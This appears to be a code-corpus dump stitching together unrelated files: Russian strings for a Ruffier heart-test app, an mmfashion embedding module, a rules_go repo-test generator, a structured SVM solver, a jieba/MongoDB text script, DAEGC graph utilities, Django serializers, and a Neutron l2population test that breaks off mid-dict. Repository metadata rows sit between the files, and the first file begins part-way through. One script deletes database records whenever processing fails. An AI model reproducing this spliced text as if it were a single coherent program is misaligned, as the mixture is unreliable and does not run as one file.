txt_test1 = 'Лягте на спину и замерьте пульс за 15 секунд. Нажмите кнопку "Начать первый тест", чтобы запустить таймер.\nРезультат запишите в соответствующее поле.'
txt_test2 = 'Выполните 30 приседаний за 45 секунд. Для этого нажмите кнопку "Начать делать приседания",\nчтобы запустить счетчик приседаний.'
txt_test3 = 'Лягте на спину и замерьте пульс сначала за первые 15 секунд минуты, затем за последние 15 секунд.\nНажмите кнопку "Начать финальный тест", чтобы запустить таймер.\nЗеленым обозначены секунды, в течение которых необходимо \nпроводить измерения, черным - минуты без замера пульсаций. Результаты запишите в соответствующие поля.'
txt_sendresults = 'Отправить результаты'
txt_hinttest1 = '0'
txt_hinttest2 = '0'
txt_hinttest3 = '0'
txt_starttest1 = 'Начать первый тест'
txt_starttest2 = 'Начать делать приседания'
txt_starttest3 = 'Начать финальный тест'
time = QTime(0, 0, 15)
txt_timer = time.toString("hh:mm:ss")
txt_age = 'Полных лет:'
txt_finalwin = 'Результаты'
txt_index = 'Индекс Руфье: '
txt_workheart = 'Работоспособность сердца: '
txt_res1 = "низкая. Срочно обратитесь к врачу!"
txt_res2 = "удовлетворительная. Обратитесь к врачу!"
txt_res3 = "средняя. Возможно, стоит дополнительно обследоваться у врача."
txt_res4 = "выше среднего"
txt_res5 = "высокая"
| 60.142857
| 339
| 0.743864
|
81315adf065f888b24ce615f455cdf34ec25c8de
| 2,557
|
py
|
Python
|
mmfashion/models/embed_extractor/embed_extract.py
|
RyanJiang0416/mmfashion
|
89f56e3e631b4f5c1403f7e8897396cc02b5aa91
|
[
"Apache-2.0"
] | 952
|
2019-10-31T01:49:07.000Z
|
2022-03-29T11:33:27.000Z
|
mmfashion/models/embed_extractor/embed_extract.py
|
RyanJiang0416/mmfashion
|
89f56e3e631b4f5c1403f7e8897396cc02b5aa91
|
[
"Apache-2.0"
] | 135
|
2019-11-02T07:09:04.000Z
|
2022-03-17T06:08:11.000Z
|
mmfashion/models/embed_extractor/embed_extract.py
|
RyanJiang0416/mmfashion
|
89f56e3e631b4f5c1403f7e8897396cc02b5aa91
|
[
"Apache-2.0"
] | 239
|
2019-10-31T02:08:40.000Z
|
2022-03-22T03:14:38.000Z
|
import torch.nn as nn
from ..builder import build_loss
from ..registry import EMBEDEXTRACTOR
@EMBEDEXTRACTOR.register_module
class EmbedExtractor(nn.Module):
def __init__(self,
inchannels,
inter_channels,
loss_id=dict(
type='CELoss',
ratio=1,
weight=None,
size_average=None,
reduce=None,
reduction='mean'),
loss_triplet=dict(type='TripletLoss', method='cosine')):
super(EmbedExtractor, self).__init__()
self.embed_linear = nn.Linear(inchannels, inter_channels[0])
        self.bn = nn.BatchNorm1d(inter_channels[0])  # second positional arg of BatchNorm1d is eps, not a channel count
self.id_linear = nn.Linear(inter_channels[0], inter_channels[1])
self.loss_id = build_loss(loss_id)
if loss_triplet is not None:
self.loss_triplet = build_loss(loss_triplet)
else:
self.loss_triplet = None
def forward_train(self, x, id, triplet, pos, neg, triplet_pos_label,
triplet_neg_label):
embed = self.embed_linear(x)
id_pred = self.id_linear(embed)
loss_id = self.loss_id(id_pred, id)
if triplet:
pos_embed = self.embed_linear(pos)
neg_embed = self.embed_linear(neg)
loss_triplet = self.loss_triplet(embed, pos_embed, neg_embed,
triplet_pos_label,
triplet_neg_label)
return loss_id + loss_triplet
else:
return loss_id
def forward_test(self, x):
embed = self.embed_linear(x)
return embed
def forward(self,
x,
id,
return_loss=False,
triplet=False,
pos=None,
neg=None,
triplet_pos_label=None,
triplet_neg_label=None):
if return_loss:
return self.forward_train(x, id, triplet, pos, neg,
triplet_pos_label, triplet_neg_label)
else:
return self.forward_test(x)
def init_weights(self):
nn.init.xavier_uniform_(self.embed_linear.weight)
if self.embed_linear.bias is not None:
self.embed_linear.bias.data.fill_(0.01)
nn.init.xavier_uniform_(self.id_linear.weight)
if self.id_linear.bias is not None:
self.id_linear.bias.data.fill_(0.01)
| 33.644737
| 75
| 0.550645
|
c8361bcef7c06cb1273dbad3f1c02709bf4674b0
| 9,356
|
py
|
Python
|
tests/integration/popular_repos/popular_repos.py
|
hiro511/rules_go
|
a9a8548ceb9abdd7293df1a77e3917238ddfdccd
|
[
"Apache-2.0"
] | null | null | null |
tests/integration/popular_repos/popular_repos.py
|
hiro511/rules_go
|
a9a8548ceb9abdd7293df1a77e3917238ddfdccd
|
[
"Apache-2.0"
] | null | null | null |
tests/integration/popular_repos/popular_repos.py
|
hiro511/rules_go
|
a9a8548ceb9abdd7293df1a77e3917238ddfdccd
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# Copyright 2017 The Bazel Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from subprocess import check_output, call
from sys import exit
POPULAR_REPOS = [
dict(
name = "org_golang_x_crypto",
importpath = "golang.org/x/crypto",
urls = ["https://codeload.github.com/golang/crypto/zip/81e90905daefcd6fd217b62423c0908922eadb30"],
strip_prefix = "crypto-81e90905daefcd6fd217b62423c0908922eadb30",
type = "zip",
excludes = [
"ssh/agent:go_default_test",
"ssh:go_default_test",
"ssh/test:go_default_test",
],
),
dict(
name = "org_golang_x_net",
importpath = "golang.org/x/net",
commit = "57efc9c3d9f91fb3277f8da1cff370539c4d3dc5",
excludes = [
"bpf:go_default_test", # Needs testdata directory
"html/charset:go_default_test", # Needs testdata directory
"http2:go_default_test", # Needs testdata directory
"icmp:go_default_xtest", # icmp requires adjusting kernel options.
"nettest:go_default_test", #
"lif:go_default_test",
],
darwin_tests = [
"route:go_default_test", # Not supported on linux
]
),
dict(
name = "org_golang_x_sys",
importpath = "golang.org/x/sys",
commit = "0b25a408a50076fbbcae6b7ac0ea5fbb0b085e79",
excludes = [
"unix:go_default_xtest", # TODO(#413): External test depends on symbols defined in internal test.
],
),
dict(
name = "org_golang_x_text",
importpath = "golang.org/x/text",
commit = "a9a820217f98f7c8a207ec1e45a874e1fe12c478",
excludes = [
"encoding/japanese:go_default_test", # Needs testdata directory
"encoding/korean:go_default_test", # Needs testdata directory
"encoding/charmap:go_default_test", # Needs testdata directory
"encoding/simplifiedchinese:go_default_test", # Needs testdata directory
"encoding/traditionalchinese:go_default_test", # Needs testdata directory
"encoding/unicode/utf32:go_default_test", # Needs testdata directory
"encoding/unicode:go_default_test", # Needs testdata directory
],
),
dict(
name = "org_golang_x_tools",
importpath = "golang.org/x/tools",
commit = "663269851cdddc898f963782f74ea574bcd5c814",
excludes = [
"cmd/bundle:go_default_test", # Needs testdata directory
"cmd/callgraph:go_default_test", # Needs testdata directory
"cmd/cover:go_default_xtest", # Needs testdata directory
"cmd/guru:go_default_xtest", # Needs testdata directory
"cmd/stringer:go_default_test", # Needs testdata directory
"go/buildutil:go_default_xtest", # Needs testdata directory
"go/callgraph/cha:go_default_xtest", # Needs testdata directory
"go/callgraph/rta:go_default_xtest", # Needs testdata directory
"go/gccgoexportdata:go_default_xtest", # Needs testdata directory
"go/gcexportdata:go_default_xtest", # Needs testdata directory
"go/gcimporter15:go_default_test", # Needs testdata directory
"go/internal/gccgoimporter:go_default_test", # Needs testdata directory
"go/loader:go_default_xtest", # Needs testdata directory
"go/pointer:go_default_xtest", # Needs testdata directory
"go/ssa/interp:go_default_xtest", # Needs testdata directory
"go/ssa/ssautil:go_default_xtest", # Needs testdata directory
"go/ssa:go_default_xtest", # Needs testdata directory
"refactor/eg:go_default_xtest", # Needs testdata directory
"cmd/fiximports:go_default_test", # requires working GOROOT, not present in CI.
"cmd/godoc:go_default_xtest", # TODO(#417)
"cmd/gorename:go_default_xtest", # TODO(#417)
"go/gcimporter15:go_default_xtest", # TODO(#417)
"refactor/importgraph:go_default_xtest", # TODO(#417)
"refactor/rename:go_default_test", # TODO(#417)
"cmd/guru/testdata/src/referrers:go_default_xtest", # Not a real test
"cmd/guru/testdata/src/referrers:go_default_test", # Not a real test
"container/intsets:go_default_xtest", # TODO(#413): External test depends on symbols defined in internal test.
],
),
dict(
name = "org_golang_google_grpc",
importpath = "google.golang.org/grpc",
commit = "3f10311ccf076b6b7cba28273df3290d42e60982",
# GRPC has already-generated protobuf definitions, and we don't currently
# register any protobuf toolchains in this WORKSPACE. As such, the build
# should fail if we try to generate protobuf rules, but succeed if we
# disable generation.
build_file_proto_mode = "disable",
excludes = [
"test:go_default_test",
"examples/route_guide/mock_routeguide:go_default_xtest",
"examples/helloworld/mock_helloworld:go_default_xtest",
"credentials:go_default_test",
":go_default_test",
],
),
dict(
name = "com_github_mattn_go_sqlite3",
importpath = "github.com/mattn/go-sqlite3",
commit = "83772a7051f5e30d8e59746a9e43dfa706b72f3b",
excludes = [],
),
]
COPYRIGHT_HEADER = """
# Copyright 2017 The Bazel Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##############################
# Generated file, do not edit!
##############################
""".strip()
BZL_HEADER = COPYRIGHT_HEADER + """
load("@io_bazel_rules_go//go/private:go_repository.bzl", "go_repository")
def _maybe(repo_rule, name, **kwargs):
if name not in native.existing_rules():
repo_rule(name=name, **kwargs)
def popular_repos():
"""
BUILD_HEADER = COPYRIGHT_HEADER
DOCUMENTATION_HEADER = """
Popular repository tests
========================
These tests are designed to check that gazelle and rules_go together can cope
with a list of popular repositories people depend on.
It helps catch changes that might break a large number of users.
.. contents::
""".lstrip()
def popular_repos_bzl():
with open("popular_repos.bzl", "w") as f:
f.write(BZL_HEADER)
for repo in POPULAR_REPOS:
f.write(" _maybe(\n go_repository,\n")
for k in ["name", "importpath", "commit", "strip_prefix", "type", "build_file_proto_mode"]:
if k in repo: f.write(' {}="{}",\n'.format(k, repo[k]))
for k in ["urls"]:
if k in repo: f.write(' {}={},\n'.format(k, repo[k]))
f.write(" )\n")
def build_bazel():
with open("BUILD.bazel", "w") as f:
f.write(BUILD_HEADER)
for repo in POPULAR_REPOS:
name = repo["name"]
tests = check_output(["bazel", "query", "kind(go_test, \"@{}//...\")".format(name)]).split("\n")
excludes = ["@{}//{}".format(name, l) for l in repo.get("excludes", [])]
for k in repo:
if k.endswith("_excludes") or k.endswith("_tests"):
excludes.extend(["@{}//{}".format(name, l) for l in repo[k]])
invalid_excludes = [t for t in excludes if not t in tests]
if invalid_excludes:
exit("Invalid excludes found: {}".format(invalid_excludes))
f.write('\ntest_suite(\n')
f.write(' name = "{}",\n'.format(name))
f.write(' tests = [\n')
actual = []
for test in sorted(tests, key=lambda test: test.replace(":", "!")):
if test in excludes or not test: continue
f.write(' "{}",\n'.format(test))
actual.append(test)
f.write(' ],\n')
#TODO: add in the platform "select" tests
f.write(')\n')
repo["actual"] = actual
def readme_rst():
with open("README.rst", "w") as f:
f.write(DOCUMENTATION_HEADER)
for repo in POPULAR_REPOS:
name = repo["name"]
f.write("{}\n{}\n\n".format(name, "_"*len(name)))
f.write("This runs tests from the repository `{0} <https://{0}>`_\n\n".format(repo["importpath"]))
for test in repo["actual"]:
f.write("* {}\n".format(test))
f.write("\n\n")
def main():
popular_repos_bzl()
build_bazel()
readme_rst()
if __name__ == "__main__":
main()
| 39.476793
| 122
| 0.639376
|
6db641f33d18662a78aff01101cd79de86cf0fcd
| 3,566
|
py
|
Python
|
mantra/mantra_solver.py
|
durandtibo/mantra-python
|
a35dfd93f92f7f510a212ee5356ae4d776a27849
|
[
"MIT"
] | 1
|
2019-02-22T09:48:04.000Z
|
2019-02-22T09:48:04.000Z
|
mantra/mantra_solver.py
|
durandtibo/mantra-python
|
a35dfd93f92f7f510a212ee5356ae4d776a27849
|
[
"MIT"
] | null | null | null |
mantra/mantra_solver.py
|
durandtibo/mantra-python
|
a35dfd93f92f7f510a212ee5356ae4d776a27849
|
[
"MIT"
] | null | null | null |
import time
from mantra.util.data.labeled_object import LabeledObject
from mantra.util.solver.loss import Loss
from mantra.util.solver.sgd_solver import SGDSolver
from mantra.util.solver.ssg_solver import SSGSolver
class MantraLoss(Loss):
def __str__(self):
return "MantraLoss"
def evaluate(self, model, x, y):
""" Evaluate the loss for the given model, pattern and label. The return value is a scalar.
- model: model
- x: pattern
- y: label """
# compute the loss augmented inference
y_star, h_star = self.max_oracle(model, x, y)
# compute the best latent value for label y
h_bar = model.predict(x, y)
# compute the loss term
return model.loss(y, y_star) + model.value_of(x, y_star, h_star) - model.value_of(x, y, h_bar)
def compute_gradient(self, model, x, y, y_star2=None):
""" Compute the gradient of the hinge loss for the given model, pattern and label. The return value is a vector.
- model: model
- x: pattern
- y: label """
if y_star2 is None:
# compute the loss augmented inference
y_star, h_star = self.max_oracle(model, x, y)
else:
y_star, h_star = y_star2
if y_star == y:
# for this case, the gradient is zero
return None
# compute the best latent value for label y
h_bar = model.predict(x, y)
# compute the gradient of the loss
return model.sub(model.feature_map(x, y_star, h_star), x, y, h_bar)
def error(self, model, y_truth, y):
""" Compute the loss function
- y_truth: label
- y: label """
return model.loss(y_truth, y)
def max_oracle(self, model, x, y_star):
""" Compute the loss-augmented inference defined in model for pattern x and label y
- x: pattern
- y_star: label
return (label, (h^+, h^-)) """
return model.max_oracle(x, y_star)
def initialize_mantra_data(model, data):
initialized_data = list()
for i in range(len(data)):
pattern = data[i].pattern
label = data[i].label
latent = model.initialize_latent(pattern, label)
initialized_data.append(LabeledObject(pattern, (label, latent)))
return initialized_data
###############################################################################
# MantraWithSGD
###############################################################################
class MantraWithSGD:
def __init__(self, lambdaa=1e-4, num_epochs=25, sample='perm', seed=1, verbose=1, show_debug_every=0):
self.lambdaa = lambdaa
self.num_epochs = num_epochs
self.sample = sample
self.seed = seed
self.verbose = verbose
self.show_debug_every = int(show_debug_every)
def optimize(self, model, data, val_data=None):
solver = SGDSolver(MantraLoss(), self.lambdaa, self.num_epochs, self.sample, self.seed, self.verbose, self.show_debug_every)
return solver.optimize(model, data, val_data)
###############################################################################
# MantraWithSSG
###############################################################################
class MantraWithSSG:
def __init__(self, lambdaa=1e-4, num_epochs=25, sample='perm', do_weighted_averaging=False, seed=1, verbose=1, show_debug_every=0):
self.lambdaa = lambdaa
self.num_epochs = num_epochs
self.sample = sample
self.do_weighted_averaging = do_weighted_averaging
self.seed = seed
self.verbose = verbose
self.show_debug_every = int(show_debug_every)
def optimize(self, model, data, val_data=None):
solver = SSGSolver(MantraLoss(), self.lambdaa, self.num_epochs, self.sample, self.do_weighted_averaging, self.seed, self.verbose, self.show_debug_every)
return solver.optimize(model, data, val_data)
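# --- Hedged usage sketch (not part of the original module) ---
# Both wrappers above delegate to the SGD/SSG solvers with a MantraLoss. A
# typical call assumes `model` implements the latent-structured interface used
# by MantraLoss (max_oracle, predict, value_of, feature_map, sub, loss) and
# that `raw_data` is a list of LabeledObject instances:
#
#   train_data = initialize_mantra_data(model, raw_data)
#   solver = MantraWithSGD(lambdaa=1e-4, num_epochs=25)
#   w = solver.optimize(model, train_data)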
| 29.966387
| 154
| 0.661526
|
9f1032b25a86a7922e2ba9f8bf85956e1680122c
| 922
|
py
|
Python
|
data_processing/cut_and_remove_stop_words.py
|
lvyufeng/cnki_h5_papers_auto_downloader
|
8b2f92cbee2f3de9afa3754ee971cdc60712310e
|
[
"MIT"
] | 2
|
2020-10-14T11:44:16.000Z
|
2021-08-30T13:43:30.000Z
|
data_processing/cut_and_remove_stop_words.py
|
lvyufeng/cnki_h5_papers_auto_downloader
|
8b2f92cbee2f3de9afa3754ee971cdc60712310e
|
[
"MIT"
] | null | null | null |
data_processing/cut_and_remove_stop_words.py
|
lvyufeng/cnki_h5_papers_auto_downloader
|
8b2f92cbee2f3de9afa3754ee971cdc60712310e
|
[
"MIT"
] | null | null | null |
import jieba
import pymongo
def stop_words_list():
stop_words = [line.strip() for line in open('stopword.txt','r+',encoding='UTF-8').readlines()]
return stop_words
def cut_words(sentence):
sentence_cut = jieba.cut(sentence.strip())
stop_words = stop_words_list()
output = ''
for word in sentence_cut:
if word not in stop_words:
output += word
output += ' '
return output
output_filename = 'abstracts.txt'
outputs = open(output_filename,'w+',encoding='UTF-8')
client = pymongo.MongoClient('202.202.5.140')
collection = client['cnki_papers']
db = collection['paper_detail']
for i in db.find():
try:
line = cut_words(i['a_abstract'].replace('\n摘 要:\n',''))
outputs.write(i['filename']+ '\t' + i['top-title'].strip() + '\t' + line + '\n')
except Exception as e:
print(i['filename'])
db.remove(i)
outputs.close()
| 23.641026
| 98
| 0.621475
|
a4b56c8a5c8c22471b9971824ea5601877f8a412
| 914
|
py
|
Python
|
DAEGC/utils.py
|
JLUVicent/DAEGC
|
9a4cc50e40e8521fafb00960d1adf8216674c8f6
|
[
"MIT"
] | 32
|
2021-03-26T13:15:34.000Z
|
2022-03-14T06:07:57.000Z
|
DAEGC/utils.py
|
JLUVicent/DAEGC
|
9a4cc50e40e8521fafb00960d1adf8216674c8f6
|
[
"MIT"
] | 3
|
2021-06-05T12:06:57.000Z
|
2021-12-10T03:09:20.000Z
|
DAEGC/utils.py
|
JLUVicent/DAEGC
|
9a4cc50e40e8521fafb00960d1adf8216674c8f6
|
[
"MIT"
] | 8
|
2021-04-25T01:32:22.000Z
|
2022-03-30T08:16:20.000Z
|
import numpy as np
import torch
from sklearn.preprocessing import normalize
from torch_geometric.datasets import Planetoid
def get_dataset(dataset):
datasets = Planetoid('./dataset', dataset)
return datasets
def data_preprocessing(dataset):
dataset.adj = torch.sparse_coo_tensor(
dataset.edge_index, torch.ones(dataset.edge_index.shape[1]), torch.Size([dataset.x.shape[0], dataset.x.shape[0]])
).to_dense()
dataset.adj_label = dataset.adj
dataset.adj += torch.eye(dataset.x.shape[0])
dataset.adj = normalize(dataset.adj, norm="l1")
dataset.adj = torch.from_numpy(dataset.adj).to(dtype=torch.float)
return dataset
def get_M(adj):
adj_numpy = adj.cpu().numpy()
# t_order
t=2
tran_prob = normalize(adj_numpy, norm="l1", axis=0)
M_numpy = sum([np.linalg.matrix_power(tran_prob, i) for i in range(1, t + 1)]) / t
return torch.Tensor(M_numpy)
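# --- Hedged usage sketch (not part of the original module) ---
# get_M above averages the 1- and 2-step column-normalised transition matrices
# (t = 2). The tiny 3-node adjacency below is a made-up example just to show
# the expected input/output shapes.
if __name__ == "__main__":
    toy_adj = torch.tensor([[0., 1., 1.],
                            [1., 0., 0.],
                            [1., 0., 0.]])
    M = get_M(toy_adj)
    print(M.shape)  # torch.Size([3, 3])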
| 27.69697
| 121
| 0.702407
|
081b3b75dd2cf5d1e7ea32e0173a33362e465e5b
| 2,173
|
py
|
Python
|
coogger/cooggerapi/serializers.py
|
adilkhan8000/coogger
|
0d9350116bec29c0c4f5229118e4045c9e64d796
|
[
"MIT"
] | null | null | null |
coogger/cooggerapi/serializers.py
|
adilkhan8000/coogger
|
0d9350116bec29c0c4f5229118e4045c9e64d796
|
[
"MIT"
] | null | null | null |
coogger/cooggerapi/serializers.py
|
adilkhan8000/coogger
|
0d9350116bec29c0c4f5229118e4045c9e64d796
|
[
"MIT"
] | null | null | null |
from rest_framework import serializers
# models
from cooggerapp.models import (
Content, OtherInformationOfUsers,
SearchedWords, UserFollow)
from django_steemconnect.models import SteemConnectUser, Community
class SearchedWordsSerializer(serializers.ModelSerializer):
class Meta:
model = SearchedWords
fields = ("word", "hmany")
class UserFollowSerializer(serializers.ModelSerializer):
class Meta:
model = UserFollow
fields = ("username", "choices", "adress")
class CommunitySerializer(serializers.ModelSerializer):
class Meta:
model = Community
fields = ("name", "host_name", "redirect_url",
"client_id", "app_secret", "login_redirect",
"scope", "icon_address", "ms", "management_user", "management","active")
class SteemConnectUserSerializer(serializers.ModelSerializer):
class Meta:
model = SteemConnectUser
fields = (
'user',
"username",
"access_token",
"refresh_token",
"code",
"community",
"community_name"
)
class UserSerializer(serializers.ModelSerializer):
class Meta:
model = OtherInformationOfUsers
fields = (
"user",
'username',
"about",
"cooggerup_confirmation",
"cooggerup_percent",
"vote_percent",
"beneficiaries",
"sponsor",
"total_votes",
"total_vote_value",
)
class ContentsSerializer(serializers.ModelSerializer):
class Meta:
model = Content
fields = (
"community",
"community_name",
"user",
'username',
'title',
'permlink',
'content',
"tag",
"category",
"language",
"definition",
"topic",
"status",
"time",
"dor",
"views",
"read",
"lastmod",
"mod",
"modusername",
"cooggerup",
)
| 23.619565
| 90
| 0.525541
|
44a686e61455375dc99ff3ab4de0ba790454f6ea
| 24,431
|
py
|
Python
|
neutron/tests/unit/ml2/drivers/test_l2population.py
|
plumgrid/plumgrid-quantum
|
dbd7e472ca28d22d694eeeba47e0738985583961
|
[
"Apache-2.0"
] | 1
|
2016-04-23T21:33:31.000Z
|
2016-04-23T21:33:31.000Z
|
neutron/tests/unit/ml2/drivers/test_l2population.py
|
plumgrid/plumgrid-quantum
|
dbd7e472ca28d22d694eeeba47e0738985583961
|
[
"Apache-2.0"
] | null | null | null |
neutron/tests/unit/ml2/drivers/test_l2population.py
|
plumgrid/plumgrid-quantum
|
dbd7e472ca28d22d694eeeba47e0738985583961
|
[
"Apache-2.0"
] | 4
|
2015-04-14T10:06:51.000Z
|
2019-10-02T01:28:34.000Z
|
# Copyright (c) 2013 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
# @author: Sylvain Afchain, eNovance SAS
# @author: Francois Eleouet, Orange
# @author: Mathieu Rohon, Orange
import mock
from neutron.common import constants
from neutron.common import topics
from neutron import context
from neutron.db import agents_db
from neutron.db import api as db_api
from neutron.extensions import portbindings
from neutron.extensions import providernet as pnet
from neutron import manager
from neutron.openstack.common import timeutils
from neutron.plugins.ml2 import config as config
from neutron.plugins.ml2.drivers.l2pop import constants as l2_consts
from neutron.plugins.ml2 import managers
from neutron.plugins.ml2 import rpc
from neutron.tests.unit import test_db_plugin as test_plugin
HOST = 'my_l2_host'
L2_AGENT = {
'binary': 'neutron-openvswitch-agent',
'host': HOST,
'topic': constants.L2_AGENT_TOPIC,
'configurations': {'tunneling_ip': '20.0.0.1',
'tunnel_types': ['vxlan']},
'agent_type': constants.AGENT_TYPE_OVS,
'tunnel_type': [],
'start_flag': True
}
L2_AGENT_2 = {
'binary': 'neutron-openvswitch-agent',
'host': HOST + '_2',
'topic': constants.L2_AGENT_TOPIC,
'configurations': {'tunneling_ip': '20.0.0.2',
'tunnel_types': ['vxlan']},
'agent_type': constants.AGENT_TYPE_OVS,
'tunnel_type': [],
'start_flag': True
}
L2_AGENT_3 = {
'binary': 'neutron-openvswitch-agent',
'host': HOST + '_3',
'topic': constants.L2_AGENT_TOPIC,
'configurations': {'tunneling_ip': '20.0.0.2',
'tunnel_types': []},
'agent_type': constants.AGENT_TYPE_OVS,
'tunnel_type': [],
'start_flag': True
}
PLUGIN_NAME = 'neutron.plugins.ml2.plugin.Ml2Plugin'
NOTIFIER = 'neutron.plugins.ml2.rpc.AgentNotifierApi'
class TestL2PopulationRpcTestCase(test_plugin.NeutronDbPluginV2TestCase):
def setUp(self):
# Enable the test mechanism driver to ensure that
# we can successfully call through to all mechanism
# driver apis.
config.cfg.CONF.set_override('mechanism_drivers',
['openvswitch', 'linuxbridge',
'l2population'],
'ml2')
super(TestL2PopulationRpcTestCase, self).setUp(PLUGIN_NAME)
self.addCleanup(config.cfg.CONF.reset)
self.adminContext = context.get_admin_context()
self.type_manager = managers.TypeManager()
self.notifier = rpc.AgentNotifierApi(topics.AGENT)
self.callbacks = rpc.RpcCallbacks(self.notifier, self.type_manager)
self.orig_supported_agents = l2_consts.SUPPORTED_AGENT_TYPES
l2_consts.SUPPORTED_AGENT_TYPES = [constants.AGENT_TYPE_OVS]
net_arg = {pnet.NETWORK_TYPE: 'vxlan',
pnet.SEGMENTATION_ID: '1'}
self._network = self._make_network(self.fmt, 'net1', True,
arg_list=(pnet.NETWORK_TYPE,
pnet.SEGMENTATION_ID,),
**net_arg)
notifier_patch = mock.patch(NOTIFIER)
notifier_patch.start()
self.fanout_topic = topics.get_topic_name(topics.AGENT,
topics.L2POPULATION,
topics.UPDATE)
fanout = ('neutron.openstack.common.rpc.proxy.RpcProxy.fanout_cast')
fanout_patch = mock.patch(fanout)
self.mock_fanout = fanout_patch.start()
cast = ('neutron.openstack.common.rpc.proxy.RpcProxy.cast')
cast_patch = mock.patch(cast)
self.mock_cast = cast_patch.start()
uptime = ('neutron.plugins.ml2.drivers.l2pop.db.L2populationDbMixin.'
'get_agent_uptime')
uptime_patch = mock.patch(uptime, return_value=190)
uptime_patch.start()
self.addCleanup(mock.patch.stopall)
self.addCleanup(db_api.clear_db)
def tearDown(self):
l2_consts.SUPPORTED_AGENT_TYPES = self.orig_supported_agents
super(TestL2PopulationRpcTestCase, self).tearDown()
def _register_ml2_agents(self):
callback = agents_db.AgentExtRpcCallback()
callback.report_state(self.adminContext,
agent_state={'agent_state': L2_AGENT},
time=timeutils.strtime())
callback.report_state(self.adminContext,
agent_state={'agent_state': L2_AGENT_2},
time=timeutils.strtime())
callback.report_state(self.adminContext,
agent_state={'agent_state': L2_AGENT_3},
time=timeutils.strtime())
def test_fdb_add_called(self):
self._register_ml2_agents()
with self.subnet(network=self._network) as subnet:
host_arg = {portbindings.HOST_ID: HOST}
with self.port(subnet=subnet,
arg_list=(portbindings.HOST_ID,),
**host_arg) as port1:
with self.port(subnet=subnet,
arg_list=(portbindings.HOST_ID,),
**host_arg):
p1 = port1['port']
device = 'tap' + p1['id']
self.mock_fanout.reset_mock()
self.callbacks.update_device_up(self.adminContext,
agent_id=HOST,
device=device)
p1_ips = [p['ip_address'] for p in p1['fixed_ips']]
expected = {'args':
{'fdb_entries':
{p1['network_id']:
{'ports':
{'20.0.0.1': [[p1['mac_address'],
p1_ips[0]]]},
'network_type': 'vxlan',
'segment_id': 1}}},
'namespace': None,
'method': 'add_fdb_entries'}
self.mock_fanout.assert_called_with(
mock.ANY, expected, topic=self.fanout_topic)
def test_fdb_add_not_called_type_local(self):
self._register_ml2_agents()
with self.subnet(network=self._network) as subnet:
host_arg = {portbindings.HOST_ID: HOST + '_3'}
with self.port(subnet=subnet,
arg_list=(portbindings.HOST_ID,),
**host_arg) as port1:
with self.port(subnet=subnet,
arg_list=(portbindings.HOST_ID,),
**host_arg):
p1 = port1['port']
device = 'tap' + p1['id']
self.mock_fanout.reset_mock()
self.callbacks.update_device_up(self.adminContext,
agent_id=HOST,
device=device)
self.assertFalse(self.mock_fanout.called)
def test_fdb_add_two_agents(self):
self._register_ml2_agents()
with self.subnet(network=self._network) as subnet:
host_arg = {portbindings.HOST_ID: HOST,
'admin_state_up': True}
with self.port(subnet=subnet,
arg_list=(portbindings.HOST_ID, 'admin_state_up',),
**host_arg) as port1:
host_arg = {portbindings.HOST_ID: HOST + '_2',
'admin_state_up': True}
with self.port(subnet=subnet,
arg_list=(portbindings.HOST_ID,
'admin_state_up',),
**host_arg) as port2:
p1 = port1['port']
p2 = port2['port']
device = 'tap' + p1['id']
self.mock_cast.reset_mock()
self.mock_fanout.reset_mock()
self.callbacks.update_device_up(self.adminContext,
agent_id=HOST,
device=device)
p1_ips = [p['ip_address'] for p in p1['fixed_ips']]
p2_ips = [p['ip_address'] for p in p2['fixed_ips']]
expected1 = {'args':
{'fdb_entries':
{p1['network_id']:
{'ports':
{'20.0.0.2': [constants.FLOODING_ENTRY,
[p2['mac_address'],
p2_ips[0]]]},
'network_type': 'vxlan',
'segment_id': 1}}},
'namespace': None,
'method': 'add_fdb_entries'}
topic = topics.get_topic_name(topics.AGENT,
topics.L2POPULATION,
topics.UPDATE,
HOST)
self.mock_cast.assert_called_with(mock.ANY,
expected1,
topic=topic)
expected2 = {'args':
{'fdb_entries':
{p1['network_id']:
{'ports':
{'20.0.0.1': [constants.FLOODING_ENTRY,
[p1['mac_address'],
p1_ips[0]]]},
'network_type': 'vxlan',
'segment_id': 1}}},
'namespace': None,
'method': 'add_fdb_entries'}
self.mock_fanout.assert_called_with(
mock.ANY, expected2, topic=self.fanout_topic)
def test_fdb_add_called_two_networks(self):
self._register_ml2_agents()
with self.subnet(network=self._network) as subnet:
host_arg = {portbindings.HOST_ID: HOST + '_2'}
with self.port(subnet=subnet,
arg_list=(portbindings.HOST_ID,),
**host_arg) as port1:
with self.subnet(cidr='10.1.0.0/24') as subnet2:
with self.port(subnet=subnet2,
arg_list=(portbindings.HOST_ID,),
**host_arg):
host_arg = {portbindings.HOST_ID: HOST}
with self.port(subnet=subnet,
arg_list=(portbindings.HOST_ID,),
**host_arg) as port3:
p1 = port1['port']
p3 = port3['port']
device = 'tap' + p3['id']
self.mock_cast.reset_mock()
self.mock_fanout.reset_mock()
self.callbacks.update_device_up(
self.adminContext, agent_id=HOST,
device=device)
p1_ips = [p['ip_address']
for p in p1['fixed_ips']]
expected1 = {'args':
{'fdb_entries':
{p1['network_id']:
{'ports':
{'20.0.0.2':
[constants.FLOODING_ENTRY,
[p1['mac_address'],
p1_ips[0]]]},
'network_type': 'vxlan',
'segment_id': 1}}},
'namespace': None,
